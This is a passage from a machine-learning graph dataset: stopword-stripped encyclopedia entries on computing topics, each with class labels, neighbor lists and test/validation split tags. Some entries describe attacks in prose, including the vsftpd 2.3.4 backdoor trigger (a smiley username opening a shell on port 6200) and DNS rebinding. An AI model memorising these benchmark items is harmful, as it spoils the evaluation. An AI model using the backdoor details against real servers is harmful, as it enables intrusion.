address space several distinct sub-spaces address modifier 6 bit wide set signals backplane address modifiers specify number significant address bits privilege mode allow processors distinguish bus accesses user level system level software whether transfer block transfer incomplete table address modifiers vme also decodes seven 68000 interrupt levels onto 7-pin interrupt bus interrupt scheme one prioritized vectored interrupts interrupt request lines irq1 irq7 prioritize interrupts interrupting module asserts one interrupt request lines module bus may potentially handle interrupt interrupt handling module recognizes interrupt request priority handles arbitrates bus usual fashion described performs read interrupt vector driving binary version irq line handles e.g irq5 handled binary 101 onto address bus also asserts iack line along appropriate data transfer strobes width status/id read lword* ds0* ds1* allow status/id read cycles 8 16 32 bit wide transfers existing hardware interrupters use 8 bit status/ids interrupter responds transferring status/id data bus describe interrupt interrupt handling module usually cpu usually use status/id number identify run appropriate software interrupt service routine vme bus transfers dma every card master slave bus standards considerable amount complexity added order support various transfer types master/slave selection instance isa bus features added alongside existing channels model whereby communications handled host cpu makes vme considerably simpler conceptual level powerful though requires complex controllers card developing and/or troubleshooting vme bus examination hardware signals important logic analyzers bus analyzers tools collect analyze decode store signals people view high-speed waveforms leisure vita offers comprehensive faq assist front end design development vme systems computers using vmebus include",
    "neighbors": [
      8708,
      7045,
      7302,
      7049,
      3594,
      10104,
      5270,
      408,
      2201,
      3098,
      7709,
      799,
      9633,
      2723,
      5671,
      7849,
      4396,
      6904,
      8625,
      434,
      3762,
      6329,
      11321,
      5439,
      7104,
      10051,
      3780,
      3142,
      2895,
      5457,
      10833,
      9686,
      10332,
      6624,
      9955,
      4581,
      7269,
      5863,
      11627,
      1776,
      8048,
      8944,
      3445,
      8190,
      11125,
      5368,
      11637,
      8828,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 6188,
    "label": 9,
    "text": "Matita:matita matita experimental proof assistant development computer science department university bologna tool aiding development formal proofs man-machine collaboration providing programming environment formal specifications executable algorithms automatically verifiable correctness certificates naturally coexist matita based dependent type system known calculus co inductive constructions derivative calculus constructions compatible extent coq word matita means pencil italian simple widespread editing tool reasonably small simple application whose architectural software complexity meant mastered students providing tool particularly suited testing innovative ideas solutions matita adopts tactic-based editing mode xml-encoded proof objects produced storage exchange existential variables native matita allowing simpler management dependent goals matita implements bidirectional type inference algorithm exploiting inferred expected types power type inference system refiner augmented mechanism hints helps synthetizing unifiers particular situations specified user matita supports sophisticated disambiguation strategy based dialog parser typechecker interactive level system implements small step execution structured tactics allowing much better management proof development naturally leading structured readable scripts matita employed cerco certified complexity fp7 european project focused development formally verified complexity preserving compiler large subset c assembler mcs-51 microprocessor matita tutorial provides pragmatic introduction main functionalities matita interactive theorem prover offering guided tour set trivial examples field software specification verification",
    "neighbors": [
      8924,
      5796,
      8511,
      415,
      823,
      8926,
      7983,
      369,
      4791,
      5399,
      6239,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6189,
    "label": 5,
    "text": "Vsftpd:vsftpd vsftpd secure ftp daemon ftp server unix-like systems including linux licensed gnu general public license supports ipv6 ssl vsftpd supports explicit since 2.0.0 implicit since 2.1.0 ftps vsftpd default ftp server ubuntu centos fedora nimblex slackware rhel linux distributions july 2011 discovered vsftpd version 2.3.4 downloadable master site compromised users logging compromised vsftpd-2.3.4 server may issue smileyface username gain command shell port 6200 issue security hole vsftpd instead unknown attacker uploaded different version vsftpd contained backdoor since site moved google app engine",
    "neighbors": [
      7364,
      3717,
      1062,
      10149,
      8957,
      107,
      7983,
      8368,
      5397,
      823,
      4349,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 6190,
    "label": 1,
    "text": "SQLBits:sqlbits sqlbits largest community-led sql server microsoft data platform conference europe founded 2007 group individuals passionate microsoft sql server azure product suite volunteers include committee members speakers helpers industry sponsors come together provide microsoft sql server education sqlbits held year sessions recorded hosted sqlbits website freely available everyone download one key principles sqlbits community led conference located one specific area uk instead conference reaches sql server community moving event around uk 16 sqlbits conferences date key dates locations listed",
    "neighbors": [
      11030,
      1935
    ],
    "mask": "Test"
  },
  {
    "node_id": 6191,
    "label": 9,
    "text": "DataViva:dataviva dataviva information visualization engine created strategic priorities office government minas gerais dataviva makes official data exports industries locations occupations available entirety brazil eight apps 100 million possible visualizations first set datum – also available aliceweb – provided mdic ministry development industry foreign trade secex secretariat foreign trade official institution government brazil shows foreign trade statistics exporting municipalities country database provided ministério trabalho e emprego mte – ministry labor employment shows information industries occupations brazil rais – annual social information report platform consists eight core applications allows different ways visualizing data available applications descriptive showing data aggregated various levels simple comparative way treemapping others prescriptive using calculations allow analytic visualization data based theories product space applications generated using d3plus open source javascript library built top d3.js alexander simoes dave landry inspired observatory economic complexity dataviva open data open-source free use tool developed partnership datawheel co-founded mit media lab professor césar hidalgo maintained government minas gerais",
    "neighbors": [
      8554,
      11221,
      3462
    ],
    "mask": "Test"
  },
  {
    "node_id": 6192,
    "label": 3,
    "text": "Socket_M:socket socket mpga478mt cpu interface introduced intel 2006 intel core line mobile processors socket used intel core products well core-derived dual-core xeon codenamed sossaman also used first generation mobile version intel core 2 duo specifically t5x00 t7x00 merom lines referred napa refresh though line switched socket p santa rosa 2007 typically uses intel 945pm/945gm chipsets support 667 mhz fsb intel pm965/gm965 allows 800 mhz fsb support though socket pm965/gm965 combination less common sossaman xeons use e7520 chipset socket pin-compatible desktop socket mpga478a electrically compatible socket pin-compatible older desktop socket 478 mpga478b newer mobile socket p mpga478mn location one pin also incompatible versions older mobile socket 479 pentium iii-m processors designed first version socket 479 physically fit socket electrically incompatible although conflicting information published 45 nm penryn processors released socket",
    "neighbors": [
      3588,
      9611,
      5901,
      5523,
      2455,
      3352,
      3992,
      8855,
      3995,
      4252,
      11417,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      3317,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 6193,
    "label": 4,
    "text": "Rohit_Khare:rohit khare rohit khare computer science entrepreneur active many aspects development world wide web founder ångströ co-founder knownow former director commercenet labs key player microformats community holds ph.d. university california irvine bachelors caltech computer science previously worked internet security w3c also active representational state transfer rest community august 2007 authored arrested paper syndication-oriented architecture variant service-oriented architecture",
    "neighbors": [
      4107,
      3941,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6194,
    "label": 2,
    "text": "Event_flag:event flag event flag process synchronization primitive openvms operating system two possible states set cleared following basic primitive operations provided additional synchronization operations event flags either local per-process common accessible one process process set 64 local flags numbered 0-63 also possible associate process 2 sets common event flags come sets 32 process assign numbers 64-95 96-127 come existence first process associates disappear last process removes association every potentially time-consuming asynchronous system call qio among others includes argument specifying number event flag set completion compare semaphore",
    "neighbors": [
      10590
    ],
    "mask": "Test"
  },
  {
    "node_id": 6195,
    "label": 4,
    "text": "Australian_Information_Security_Association:australian information security association nationally recognised not-for-profit organisation charity australian information security association aisa champions development robust information security sector building capacity professionals australia advancing cyber security safety australian public well businesses governments australia established 1999 aisa become recognised authority information security australia membership 3000 individuals across country aisa caters domains information security industry particular focus sharing expertise field meetings focus groups networking opportunities around australia aisa vision world people businesses governments educated risks dangers cyber attack data theft enable take reasonable precautions protect independent non-profit association created provide leadership development promotion improvement profession strategic plan calls continued work areas advocacy diversity education organisational excellence aisa hosts australia largest independent not-for-profit cyber security conference australian cyber conference https //cyberconference.com.au/ guidelines provide direction post-nominals represented indicate aisa membership status post-nominals letters placed following person ’ last name indicate aisa membership status encourage members use maisa aaisa faisa applicable post-nominals every opportunity including email sign-offs official letters tender documents etc helps raise profile professional status membership aisa post-nominals listed following order",
    "neighbors": [
      4435
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6196,
    "label": 3,
    "text": "Lot_Lot:lot lot player controls one arrow move pellets resemble pachinko balls upper cells four-second delay lower ones without confront evil crab grab player pellets try prevent player scoring cutting elastic crab forced leave board pellets find",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6197,
    "label": 3,
    "text": "1chipMSX:1chipmsx one chip msx 1chipmsx d4 enterprise distributional name ese msx system 3 re-implementation msx-2 home computer uses single fpga implement electronics except ram msx-2 including msx-music scc+ audio extensions system housed transparent blue plastic box used standard monitor tv pc keyboard original msx cartridges inserted well sd mmc memory cards external storage medium even though lacks 3.5 disk drive disks supported emulation memory card including support booting msx-dos due vhdl programmable hardware possible give device new hardware extensions simply running reconfiguration program msx-dos one chip-msx equipped two usb connectors used adding supporting vhdl code ese msx system 3 designed ese artists factory distributed 1chipmsx d4 enterprise supposed distributed outside japan bazix however due rohs regulations europe claimed could distributed europe original form european market wait adapted version would produced bazix distributed europe bazix however violation rohs ever proven identifiable components pcb power supply rohs-compliant bazix stopped representative msx association thus bring 1chipmsx western market end msx association dissolved due dispute parties involved resulting shift intellectual property rights concerning msx msx licensing corporation bazix also dissolved dispute made end efforts ambitions bring 1chipmsx western market along projects also dependent japanese partners included also default specifications implemented msx system",
    "neighbors": [
      9006,
      7983,
      1776,
      5265,
      3762,
      403
    ],
    "mask": "None"
  },
  {
    "node_id": 6198,
    "label": 6,
    "text": "Romfs:romfs computing romfs rom filesystem extremely simple file system lacking many features intended burning important files onto eeprom available linux possibly unix-like systems useful initial rom holding kernel modules loaded later needed small code wise description filesystem layout available lxr -- romfs.txt bo brantén created romfs file system driver windows nt/2k/xp nikolay aleksandrov written romfs image extraction manipulation tool called romfser primarily targeted bsd family operating systems lack support romfs",
    "neighbors": [
      9762,
      7983,
      5397,
      823,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 6199,
    "label": 7,
    "text": "Proven_(company):proven company proven hiring tool content hub small businesses across united states proven software allowed managers post jobs 100 job sites including simply hired craigslist indeed proven proven also offered tools allow users sort evaluate message onboard applicants job seekers could apply directly jobs proven mobile apps proven website proven job board partners proven based san francisco california austin texas used 1,000 small businesses throughout united states proven co-founded pablo fuentes sean falconer joe mellin 2009 company privately held seed investment andreessen horowitz greylock partners kapor capital 500 startups founder collective morado ventures angels august 2012 proven launched free proven job search app ios december 2012 proven job search android launched proven job search allows users search apply jobs directly ios android device users also import resume create one directly within app 2013 proven pivoted become hiring tool job board specifically restaurant hospitality industries proven app remains active tool applicants apply jobs early 2015 proven also rolled onboarding feature stores documents allows applicants sign electronically fall 2015 proven expanded hiring tool job board small businesses industries nationwide august 2019 proven announced acquired upward.net job site headquartered newark california",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6200,
    "label": 8,
    "text": "WalkMe:walkme walkme owned walkme inc. software-as-a-service saas company helps users navigate features web-based services walkme digital adoption platform dap works overlaying information tip-balloons browser window balloons break online processes step-by-step instructions according company dap collects data users behaviors action patterns platforms helps users complete online tasks without leaving screen watch video tutorials read manuals faq pages also allows users automatically get specific guidance according preference language walkme inc. founded 2011 dan adika raphael sweary eyal cohen yuval shalom ozanna april 2012 launched product walkme headquarters san francisco california january 2017 walkme acquired abbi startup specializes mobile a/b testing app engagement walkme retired abbi brand integrated services walkme ’ platform process also migrated abbi ’ existing customers april year walkme acquired jaco",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 6201,
    "label": 9,
    "text": "Kyoto_Common_Lisp:kyoto common lisp kyoto common lisp kcl implementation common lisp taichi yuasa masami hagiya written c run unix-like operating systems kcl compiled ansi c. conforms common lisp described 1984 first edition guy steele book common lisp language available licence agreement kcl notable implemented scratch outside standard committee solely basis specification one first common lisp implementations ever exposed number holes mistakes specification gone unnoticed",
    "neighbors": [
      4865,
      2438,
      9865,
      2062,
      9877,
      4122,
      1448,
      9128,
      4779,
      8883,
      6969,
      8258,
      8771,
      4550,
      11083,
      8908,
      1613,
      9299,
      1365,
      2392,
      6493,
      3176,
      2667,
      5492,
      1397,
      5494,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 6202,
    "label": 1,
    "text": "Global_Ideas_Bank:global ideas bank global ideas bank origins lie institute social inventions set 1985 nicholas albery social inventor visionary small beginnings network inventors quarterly newsletter institute grew full-fledged organisation leadership producing annual compendium running social inventions workshops promoting creative solutions around world part first european social innovations exchange 2001 institute awarded margaret mead special recognition award community creativity new century 1995 global ideas bank originally suggested american correspondent gregory wright first established online since become name entire project work work several volunteer programmers technical wizards especially flemming funch new civilization network new features added online submission voting systems categorisation message board",
    "neighbors": [
      7114,
      4651
    ],
    "mask": "None"
  },
  {
    "node_id": 6203,
    "label": 3,
    "text": "Zilog_Encore!_32:zilog encore 32 zilog encore 32 arm9-based microcontroller zilog inc company second attempt produce arm-based controllers system-on-a-chip includes integrated memory controller interfaces universal serial bus usb liquid crystal display lcd serial peripheral interface bus spi variants include version supporting magnetic stripe reader smart card reader toolkit also includes linux support",
    "neighbors": [
      4682,
      2573,
      9745,
      823,
      4569,
      1501
    ],
    "mask": "None"
  },
  {
    "node_id": 6204,
    "label": 4,
    "text": "Shell_Control_Box:shell control box shell control box scb network security appliance controls privileged access remote systems records activities replayable audit trails prevents malicious actions example records system administrator updates file server third-party network operator configures router recorded audit trails replayed like movie review events occurred content audit trails indexed make searching events automatic reporting possible scb linux-based device developed balabit application level proxy gateway 2017 balabit changed name product privileged session management psm repositioned core module privileged access management solution balabit ’ privileged session management psm shell control box scb device controls monitors audits remote administrative access servers network devices tool oversee system administrators controlling encrypted connections used administration psm scb full control ssh rdp telnet tn3270 tn5250 citrix ica vnc connections providing framework solid boundaries work administrators psm scb acts authentication gateway enforcing strong authentication users access assets psm also integrate user directories example microsoft active directory resolve group memberships users access protected servers credentials accessing server retrieved transparently psm ’ credential store third-party password management system psm impersonating authenticated user automatic password retrieval protects confidentiality passwords users never access psm controls audits privileged access wide-spread protocols ssh rdp http detailed access management helps control access servers also possible control advanced features protocols like type channels permitted example unneeded channels like file transfer file sharing disabled reducing security risk server psm policies privileged access enforced one single system avoid accidental misconfiguration human errors psm supports 4-eyes authorization principle achieved requiring authorizer allow administrators access server authorizer also possibility monitor – terminate session administrator real-time watching screen psm monitor network traffic real time execute various actions certain pattern example suspicious command window title text appears screen psm also detect specific patterns credit card numbers case detecting suspicious user action psm send e-mail alert immediately terminate connection example psm block connection destructive administrator command „ rm ” comes effect psm makes user activities traceable recording tamper-proof confidential audit trails records selected sessions encrypted timestamped digitally signed audit trails audit trails browsed online followed real-time monitor activities users psm replays recorded sessions like movie – actions users seen exactly appeared monitor balabit desktop player enables fast forwarding replays searching events example typed commands pressing enter texts seen user case problems database manipulation unexpected shutdown etc circumstances event readily available trails thus cause incident identified addition recording audit trails transferred files also recorded extracted analysis",
    "neighbors": [
      4965,
      11112,
      823,
      5433,
      10747
    ],
    "mask": "Test"
  },
  {
    "node_id": 6205,
    "label": 5,
    "text": "Transmux:transmux transmux transcode-multiplexing signaling format change telecommunications signaling synchronous optical network signals sonet asynchronous ds3 signals ds3 signal multiplexed 28 individual ds1 signals bit-interleaved fashion framing overhead determined intervals sonet differs approach using byte-interleaved synchronous multiplexing technique several variations payload types sonet payload carry multiplexed lower rate streams ds1 e1 ds3 etc well octet-based format tcp/ip atm frame relay ethernet etc cross-connect capability maintained vt1.5 level individual ds1 signals extracted parent ds3 electrical t1 transmuxed individually vt1.5 complete ds3 signal delivered sonet drop entire ds3 transmuxed intact sts container subsequent cross-connect capability exists sonet payload vt1.5 level white rock networks description product transmux support applications conversion ds3 vt1.5 mapped sts-1s required transmux allows ds3 embedded within sts-1 circuit adapted vt1.5 mapped sts-1 without physically terminating circuit ds3 ec-1",
    "neighbors": [
      8192
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6206,
    "label": 4,
    "text": "Patch-through_access:patch-through access patch-through access refers security clearance used various applications according application may regarded high low level security clearance",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6207,
    "label": 2,
    "text": "Comparison_of_real-time_operating_systems:comparison real-time operating systems list real-time operating systems rtos operating system time taken process input stimulus less time lapsed next input stimulus type",
    "neighbors": [
      7170,
      5638,
      8720,
      6675,
      2073,
      7745,
      7234,
      7235,
      2137,
      7774,
      5220,
      1126,
      9320,
      9835,
      3185,
      11383,
      5754,
      2179,
      6276,
      10883,
      4743,
      6797,
      2704,
      1170,
      659,
      9366,
      7319,
      9368,
      2201,
      5786,
      9371,
      4773,
      682,
      9391,
      2224,
      11447,
      1221,
      8902,
      9927,
      9928,
      10443,
      9938,
      10974,
      1253,
      5356,
      9964,
      10482,
      3323,
      10508,
      10001,
      1298,
      5397,
      7445,
      8487,
      2862,
      7983,
      10030,
      823,
      1849,
      6457,
      8508,
      7999,
      321,
      10561,
      6985,
      341,
      10590,
      10085,
      1399,
      8058,
      1917,
      3467,
      3472,
      1425,
      9628,
      9638,
      2476,
      11184,
      1462,
      2503,
      9162,
      2517,
      9685,
      4569,
      6624,
      5603,
      499,
      3061,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6208,
    "label": 0,
    "text": "Chatbot:chatbot chatbot piece software conducts conversation via auditory textual methods programs often designed convincingly simulate human would behave conversational partner although 2019 far short able pass turing test chatbots typically used dialog systems various practical purposes including customer service information acquisition chatbots use sophisticated natural language processing systems many simpler ones scan keywords within input pull reply matching keywords similar wording pattern database term chatterbot originally coined michael mauldin creator first verbot julia 1994 describe conversational programs today chatbots accessed via virtual assistants google assistant amazon alexa via messaging apps facebook messenger wechat via individual organizations apps websites chatbots classified usage categories conversational commerce e-commerce via chat analytics communication customer support design developer tools education entertainment finance food games health hr marketing news personal productivity shopping social sports travel utilities beyond chatbots conversational ai refers use messaging apps speech-based assistants chatbots automate communication create personalized customer experiences scale 1950 alan turing famous article computing machinery intelligence published proposed called turing test criterion intelligence criterion depends ability computer program impersonate human real-time written conversation human judge sufficiently well judge unable distinguish reliably—on basis conversational content alone—between program real human notoriety turing proposed test stimulated great interest joseph weizenbaum program eliza published 1966 seemed able fool users believing conversing real human however weizenbaum claim eliza genuinely intelligent introduction paper presented debunking exercise artificial intelligence ... machines made behave wondrous ways often sufficient dazzle even experienced observer particular program unmasked inner workings explained ... magic crumbles away stands revealed mere collection procedures ... observer says could written thought moves program question shelf marked intelligent reserved curios ... object paper cause re-evaluation program explained programs ever needed eliza key method operation copied chatbot designers ever since involves recognition clue words phrases input output corresponding pre-prepared pre-programmed responses move conversation forward apparently meaningful way e.g responding input contains word 'mother 'tell family thus illusion understanding generated even though processing involved merely superficial eliza showed illusion surprisingly easy generate human judges ready give benefit doubt conversational responses capable interpreted intelligent interface designers come appreciate humans readiness interpret computer output genuinely conversational—even actually based rather simple pattern-matching—can exploited useful purposes people prefer engage programs human-like gives chatbot-style techniques potentially useful role interactive systems need elicit information users long information relatively straightforward falls predictable categories thus example online help systems usefully employ chatbot techniques identify area help users require potentially providing friendlier interface formal search menu system sort usage holds prospect moving chatbot technology weizenbaum shelf ... reserved curios marked genuinely useful computational methods classic historic early chatbots eliza 1966 parry 1972 recent notable programs include a.l.i.c.e. jabberwacky d.u.d.e agence nationale de la recherche cnrs 2006 eliza parry used exclusively simulate typed conversation many chatbots include functional features games web searching abilities 1984 book called policeman beard half constructed published allegedly written chatbot racter though program released would capable one pertinent field ai research natural language processing usually weak ai fields employ specialized software programming languages created specifically narrow function required example a.l.i.c.e uses markup language called aiml specific function conversational agent since adopted various developers called alicebots nevertheless a.l.i.c.e still purely based pattern matching techniques without reasoning capabilities technique eliza using back 1966 strong ai would require sapience logical reasoning abilities jabberwacky learns new responses context based real-time user interactions rather driven static database recent chatbots also combine real-time learning evolutionary algorithms optimise ability communicate based conversation held still currently general purpose conversational artificial intelligence software developers focus practical aspect information retrieval chatbot competitions focus turing test specific goals two annual contests loebner prize chatterbox challenge latter offline since 2015 however materials still found web archives chatbots used diverse fashion across verticals many different types channel e.g websites social messaging etc business application accelerated rapidly 2019 leading van baker research vice president gartner predict “ 2020 50 medium large enterprises deployed product chatbots many companies chatbots run messaging apps simply via sms used b2c customer service sales marketing 2016 facebook messenger allowed developers place chatbots platform 30,000 bots created messenger first six months rising 100,000 september 2017 since september 2017 also part pilot program whatsapp airlines klm aeroméxico announced participation testing airlines previously launched customer services facebook messenger platform bots usually appear one user contacts sometimes act participants group chat many banks insurers media companies e-commerce companies airlines hotel chains retailers health care providers government entities restaurant chains used chatbots answer simple questions increase customer engagement promotion offer additional ways order 2017 study showed 4 companies used chatbots according 2016 study 80 businesses said intended one 2020 previous generations chatbots present company websites e.g ask jenn alaska airlines debuted 2008 expedia virtual customer service agent launched 2011 newer generation chatbots includes ibm watson-powered rocky introduced february 2017 new york city-based e-commerce company rare carat provide information prospective diamond buyers used marketers script sequences messages similar autoresponder sequence sequences triggered user opt-in use keywords within user interactions trigger occurs sequence messages delivered next anticipated user response user response used decision tree help chatbot navigate response sequnces deliver correct response message companies explore ways use chatbots internally example customer support human resources even internet-of-things iot projects overstock.com one reportedly launched chatbot named mila automate certain simple yet time-consuming processes requesting sick leave large companies lloyds banking group royal bank scotland renault citroën using automated online assistants instead call centres humans provide first point contact saas chatbot business ecosystem steadily growing since f8 conference facebook mark zuckerberg unveiled messenger would allow chatbots app large companies like hospitals aviation organizations architects designing reference architectures intelligent chatbots used unlock share knowledge experience organization efficiently reduce errors answers expert service desks significantly intelligent chatbots make use kinds artificial intelligence like image moderation natural language understanding nlu natural language generation nlg machine learning deep learning nowadays high majority high-tech banking organizations looking integration automated ai-based solutions chatbots customer service order provide faster cheaper assistance clients becoming increasingly technodexterous particularly chatbots efficiently conduct dialogue usually substituting communication tools email phone sms banking area major application related quick customer service answering common requests transactional support several studies accomplished analytics agencies juniper gartner report significant reduction cost customer services leading billions dollars economy next 10 years gartner predicts integration 2020 chatbots least 85 client applications customer service juniper study announces impressive amount 8 billion retained annually 2022 due use chatbots since 2016 facebook allows businesses deliver automated customer support e-commerce guidance content interactive experiences chatbots large variety chatbots facebook messenger platform developed 2016 russia-based tochka bank launched world first facebook bot range financial services particularly including possibility making payments july 2016 barclays africa also launched facebook chatbot making first bank africa france third largest bank total assets société générale launched chatbot called sobot march 2018 80 users sobot express satisfaction tested il never remplace expertise provided human advisor according sg deputy director bertrand cozzarolo several potential advantages using chatbots interaction customer banking chatbots also incorporated devices primarily meant computing toys hello barbie internet-connected version doll uses chatbot provided company toytalk previously used chatbot range smartphone-based characters children characters behaviors constrained set rules effect emulate particular character produce storyline ibm watson computer used basis chatbot-based educational toys companies cognitoys intended interact children educational purposes process building testing deploying chatbots done cloud-based chatbot development platforms offered cloud platform service paas providers oracle cloud platform snatchbot ibm watson cloud platforms provide natural language processing artificial intelligence mobile backend service chatbot development api companies like microsoft azure aarc currently providing bot engines chatbot platforms software developed malicious chatbots frequently used fill chat rooms spam advertisements mimicking human behavior conversations entice people revealing personal information bank account numbers commonly found yahoo messenger windows live messenger aol instant messenger instant messaging protocols also published report chatbot used fake personal ad dating service website tay ai chatbot learns previous interaction caused major controversy due targeted internet trolls twitter bot exploited 16 hours began send extremely offensive tweets users suggests although bot learnt effectively experience adequate protection put place prevent misuse text-sending algorithm pass human instead chatbot message would credible therefore human-seeming chatbots well-crafted online identities could start scattering fake news seem plausible instance making false claims presidential election enough chatbots might even possible achieve artificial social proof creation implementation chatbots still developing area heavily related artificial intelligence machine learning provided solutions possessing obvious advantages important limitations terms functionalities use cases however changing time common ones listed chatbots increasingly present businesses often used automate tasks require skill-based talents customer service taking place via messaging apps well phone calls growing numbers use-cases chatbot deployment gives organisations clear return investment call centre workers may particularly risk ai-driven chatbots study forrester june 2017 predicts 25 today jobs likely impacted ai technologies 2019",
    "neighbors": [
      5122,
      4995,
      3460,
      10242,
      2440,
      2059,
      1036,
      6798,
      11408,
      11538,
      10231,
      1044,
      5399,
      3610,
      538,
      3228,
      10271,
      3105,
      7333,
      9511,
      11692,
      7599,
      9519,
      4531,
      4662,
      3127,
      2488,
      8758,
      1467,
      4923,
      10557,
      10748,
      6982,
      6855,
      2760,
      1738,
      2892,
      3533,
      5197,
      6223,
      3284,
      2901,
      8538,
      4318,
      10591,
      8440,
      5857,
      3812,
      4068,
      6628,
      7780,
      9316,
      4329,
      9572,
      9830,
      7918,
      8046,
      8688,
      3959,
      7928,
      2170,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6209,
    "label": 4,
    "text": "DNS_rebinding:dns rebinding dns rebinding form computer attack attack malicious web page causes visitors run client-side script attacks machines elsewhere network theory same-origin policy prevents happening client-side scripts allowed access content host served script comparing domain names essential part enforcing policy dns rebinding circumvents protection abusing domain name system dns attack used breach private network causing victim web browser access computers private ip addresses return results attacker also employed use victim machine spamming distributed denial-of-service attacks malicious activities attacker registers domain attacker.com delegates dns server attacker control server configured respond short time live ttl record preventing dns response cached victim browses malicious domain attacker dns server first responds ip address server hosting malicious client-side code instance could point victim browser website contains malicious javascript flash scripts intended execute victim computer malicious client-side code makes additional accesses original domain name attacker.com permitted same-origin policy however victim browser runs script makes new dns request domain attacker replies new ip address instance could reply internal ip address ip address target somewhere else internet following techniques attempt prevent dns rebinding attacks",
    "neighbors": [
      3462,
      2887,
      5543,
      8998,
      138,
      11250,
      11221,
      5078,
      8054,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 6210,
    "label": 2,
    "text": "Shadow_RAM_(Acorn):shadow ram acorn shadow ram acorn bbc microcomputer master-series microcomputer special framebuffer implementation free main memory permit double-buffered graphics bbc micro master-series machines used 8-bit 6502 65c102 processors 16-bit address space address space split 32 kb ram 0x0000 0x7fff 16 kb sideways paged address space 0x8000 0xbfff 16 kb operating system space 0xc000 0xffff video memory allocated 0x7fff downwards necessary 1 kb teletext mode 7 20 kb modes 0-2 32 kb ram available video memory could eat sizable amount memory shadow ram 20 kb block ram sits outside real address space accessed via operating system calls framebuffer running shadow ram memory normally used video free program use shadow ram activated setting most-significant bit memory mode number example use mode 1 shadow ram enabled request mode 129 128 1 switching main shadow memory alternate frames double-buffered video could used acorn provided demonstration program basic showing scrolling cloud animation without double buffering video game firetrack would also use double buffering shadow ram present shadow ram fitted standard model b+ bbc micro bbc master series optional third-party extra feature model model b bbc micro systems",
    "neighbors": [
      6499,
      1801,
      8429,
      7983,
      7281,
      9563
    ],
    "mask": "Test"
  },
  {
    "node_id": 6211,
    "label": 4,
    "text": "Federal_Information_Security_Modernization_Act_of_2014:federal information security modernization act 2014 federal information security modernization act 2014 pub.l 113-283 s. 2521 commonly referred fisma reform signed federal law president barack obama december 18 2014 passed response increasing amount cyber attacks federal government amended existing laws enable federal government better respond cyber attacks departments agencies earlier version legislation proposed house oversight government reform chairman darrell issa co-sponsored committee ranking member elijah cummins h.r.1163 federal information security amendments act 2013 bill passed u.s. house representatives vote 416-0 final version legislation introduced united states senate committee homeland security governmental affairs thomas carper d–de june 24 2014 passed december 8 2014 senate december 10 2014 house",
    "neighbors": [
      4689,
      5780
    ],
    "mask": "None"
  },
  {
    "node_id": 6212,
    "label": 2,
    "text": "ColorOS:coloros coloros operating system created oppo electronics based google operating system android presently oppo launched 6th version major difference google stock android oppo coloros latter additional features features include customizable gestures screen screen communication phone manager lock screen magazines options long screen shot eye protection changing warmer color temperature ftp server others coloros respects looks similar ios made apple coloros removes many settings well ability restrict app background data usage removed data settings entry users may set alarms mobile data reaches certain limit opposed stock android also automatically turn mobile data moreover coloros manages ram peculiarly allows apps games run background forever apps n't force stopped apps individual settings list coloros releases 3.^ https //c.realme.com/in/board/detail/1057096670929485824",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      7364,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6213,
    "label": 3,
    "text": "Linux_console:linux console linux console system console internal linux kernel system console device receives kernel messages warnings allows logins single user mode linux console provides way kernel processes send text output user receive text input user user typically enters text computer keyboard reads output text computer monitor linux kernel supports virtual consoles consoles logically separate access physical keyboard display linux console linux virtual consoles implemented vt subsystem linux kernel rely user space software contrast terminal emulator user space process emulates terminal typically used graphical display environment linux console one first features kernel originally written linus torvalds 1991 see history linux two main implementations framebuffer text mode framebuffer implementation default modern linux distributions together kernel mode setting provides kernel-level support display hardware features showing graphics system booting legacy text mode implementation used pc-compatible systems cga ega mda vga graphics cards non-x86 architectures used framebuffer mode graphics cards implement text mode linux console uses fixed-size bitmap monospace fonts usually defaulting 8x16 pixels per character linux console optional kernel feature embedded linux systems enable systems typically provide alternative user interface e.g web based boot immediately graphical user interface use primary means interacting user implementations linux console include braille console support refreshable braille displays serial port console linux console provides way kernel processes output text-based messages user receive text-based input user linux several devices used system console virtual terminal serial port usb serial port vga text-mode framebuffer modern linux-based systems deprecated kernel based text-mode input output instead show graphical logo progress bar system booting followed immediate start graphical user interface e.g x.org server desktop distributions surfaceflinger android kernel boot console commonly used display boot log kernel boot log includes information detected hardware updates status boot procedure point time kernel software running hence logging via user-space e.g syslog possible console provides convenient place output information kernel finished booting runs init process also sending output console handles booting rest system including starting background daemons init boot process complete console used multiplex multiple virtual terminals accessible pressing ctrl-alt-f1 ctrl-alt-f2 etc. ctrl-alt-leftarrow ctrl-alt-rightarrow using chvt virtual terminal getty process run turn runs /bin/login authenticate user authentication command shell run virtual terminals like console supported linux kernel level linux console implements terminal type 